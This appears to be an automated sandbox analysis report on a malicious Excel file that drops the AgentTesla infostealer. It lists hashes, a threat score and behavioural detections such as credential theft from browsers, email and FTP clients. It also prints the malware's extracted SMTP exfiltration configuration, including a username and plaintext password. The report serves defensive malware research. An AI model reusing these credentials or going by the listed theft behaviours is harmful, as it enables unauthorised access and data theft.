General
-
Target
11203780.xls
-
Size
172KB
-
Sample
200630-qscm33xjcj
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Static task
static1
Behavioral task
behavioral1
Sample
11203780.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
11203780.xls
Resource
win10
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
pagejeffrey@yandex.com - Password:
$44#@weC0*
Targets
-
-
Target
11203780.xls
-
Size
172KB
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Score10/10-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
AgentTesla Payload
-
Blocklisted process makes network request
-
Executes dropped EXE
-
Reads data files stored by FTP clients
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Use of msiexec (install) with remote resource
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext
-